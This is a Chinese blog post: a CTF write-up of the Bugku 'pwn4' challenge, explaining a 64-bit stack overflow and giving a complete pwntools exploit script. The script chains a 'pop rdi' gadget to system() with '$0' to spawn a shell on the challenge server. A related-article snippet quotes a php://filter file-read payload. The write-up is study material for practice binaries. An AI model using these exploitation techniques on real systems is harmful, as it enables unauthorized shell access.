暑假训练pwn(4)不能被落下太远额

最新推荐文章于 2022-04-02 19:06:53 发布
原创 最新推荐文章于 2022-04-02 19:06:53 发布 · 249 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

今天做的是一道bugku的pwn题发现好多都是64位的…可能写的不太好但重在自己去理解
64位的好难不会做,pwn4,这是一个明显的栈溢出,然后我们没有’/bin/sh’额额我是用了
strings -a -tx pwn4|grep ‘’/bin/sh" 用了ROPgadget无果后直接查找发现"$0"可以代替它无语了,然后就是构造ROP链了很简单这道题
我们找到system函数的地址跳到它然后再找到"$0"的地址用pop rdi | ret 链起来就可以了
找字符串可以这样 ROPgadget --binary pwn4 --strings ‘/bin/sh’
32位的函数传参是用的栈,然后64位函数传参用的是寄存器(7位之前)rdi、rsi、rdx、rcx、r8、r9来传参
最后给上exp:

from pwn import *
def pwn(ip,port,debug):
    if(debug==1):
        p=process('./pwn4')
        elf=ELF('./pwn4')
    else:
        p=remote(ip,port)
    offset=24
    system_addr=0x000000000040075A
    print system_addr
    gadget=0x4007d3
    bin_sh=0x000000000060111f
    payload='a'*offset+p64(gadget)+p64(bin_sh)+p64(system_addr)
    p.recvuntil('Come on,try to pwn me\n')
    p.sendline(payload)
    p.interactive()

if __name__=="__main__":
    pwn('114.116.54.89',10004,1)

```还有为什么我用elf.symbols['system']找出来的函数地址不对~~~~
简单栈溢出和覆盖的思考
weixin_44222568的博客
09-15 609
1.main函数F5反编译: 两个函数,第二个是system()函数,执行括号中的shell命令,此处就是重复输hello world.(注:system()会调用fork()产生子进程, 由子进程来调用/bin/sh-c string 来执行参数string 字符串所代表的命令, 此命令执行完后随即返回原调用的进程. 比如,在代码程序内部想获取当前目录下的文件名,很简单,可以这样:system(“ls”);) 2.进入 vulnerable_function: 第一行,给buf缓冲区变量申请0x88字
ctfshow pwn4
qq_39980610的博客
08-22 814
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2784
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
ELF文件symbol分析
01-02
分析了ELF文件中symbol
ichunqiu--try to pwn.md
leeham的博客
09-23 1038
ichunqiu–try to pwn ICQ Baidu CTF try to pwn 好吧,这个题目其实还没有做到我想要的地步,我还想再深度挖掘一下,但是周末了,该写writeup了,就先把这部分总结写了,之后如果还想有其他的尝试,就继续做吧。 题目又不是我自己做出来的,当时没有发现程序的溢出点,于是就到网上看了别人的Write-up。和之前的感觉一样,溢出点其实很简单,关键在于ROP的构造,...
ELF符号表分析
astrotycoon
12-20 9349
Symbol Table An object file's symbol table holds information needed to locate and relocate a program's symbolic definitions and references. A symbol table index is a subscript into this array. Index ...
(源码)基于Python语言的PS4系统破解工具WKY Pwn.zip
最新发布
11-22
# 基于Python语言的PS4系统破解工具WKY Pwn ## 项目简介 WKY Pwn是一个基于Python语言开发的用于破解PS4系统的工具。该项目由一系列脚本组成,通过利用PlayStation 4的PPPoE协议漏洞实现远程代码执行(RCE)。该...
browser_pwn:浏览器pwn,现在主要工作
03-22
在V8_pwn中,d8经常被用来复现和调试可能导致安全漏洞的JavaScript脚本。 browser-pwn: 浏览器Pwn涵盖了所有针对浏览器的攻击技术,包括但不限于V8_pwn和JSC_pwn。这涉及到对浏览器组件(如渲染引擎、插件、...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWN不欢沙龙演讲PPT.rar
05-20
3. **整数溢出**:在处理整数运算时,如果结果超出了数据类型能表示的最大值,可能会导致错误的计算结果,这在某些情况下可以被攻击者利用。 4. **栈保护与地址空间布局随机化(ASLR)**:为了防止缓冲区溢出攻击,...
bugku-pwn3
playmaker的博客
06-04 1710
程序是一个保护全关的64位程序,主逻辑如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-10h] memset(&s, 0, 0x10uLL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1...
pwn学习系列--任务4 pwn200
weixin_44113469的博客
02-11 947
栈溢出之pwn200解题步骤 主要涉及到Ret2libc–修改返回地址,让其指向内存中已有的某个函数,还涉及到简单的rop( Return Oriented Programming )构造 思路分析:有read函数,变量buf大小为0x68,read可写入0x100,可知有栈溢出。题目中只给出system函数,没有给出“/bin/sh”,所以要自己通过read函数写入“/bin/sh”,然后返回调...
堆中获取地址和劫持执行流的方法
九层台
09-02 2067
栗子https://github.com/tower111/software.git 0x01获取栈地址 详细writeup:https://tower111.github.io/2018/08/30/ISG-babynote/ 原理:在fast bin是单链在内存中保存,在fd位置处会写入next chunk的地址,这个地址可以用来获取heap_base。 栗子:babynote 需要...
Bugku-pwn4详解
Casuall的博客
07-14 4567
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
PWN-无libc泄露
zszcr的博客
03-22 3825
pwn题的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数 (write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
BugkuCTF刷题 pwn
像初雪一样自由洒落
04-02 672
唉,觉得自己TCL,栈溢出知识点差不多都会了,可是题目做不出来啊啊啊啊!缺少锻炼吧,这两天把BugkuCTF上面的pwn题做一下吧。。。 pwn1 只给了连接 第一次,才50分,想来不会太难,连上去 果然,连接就能拿flag ...
Linux二进制ELF程序查找symbol过程分析
ronnie88597的博客
09-18 3775
文章目录0.相关section的简介.got.plt.got.plt.plt.got1.关于Partial RELRO下的外部函数延迟/惰性(lazily)调用的过程分析1.1例子1.2静态编译结果初步分析1.3GOTPLT_ADDR是什么地址?jmp到该地址将会完成那些功能?1.4对比Partial Full下的符号查找过程1.5总结一下2.参考[Runtime Dynamic Linking](http://users.eecs.northwestern.edu/~kch479/docs/notes/l
xctf ics-05 wp
doudoudedi
06-18 2784
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2771
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
蓝桥杯PWN挑战:STM32G4平台HAL库实战
资源摘要信息:"hal stm32g4 pwn.zip" ...总结而言,该文件包可能是一个训练材料集合,旨在帮助参赛者了解STM32G4平台及其HAL库的使用,并通过实际案例练习PWN技能,以便在安全竞赛如蓝桥杯中取得好成绩。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值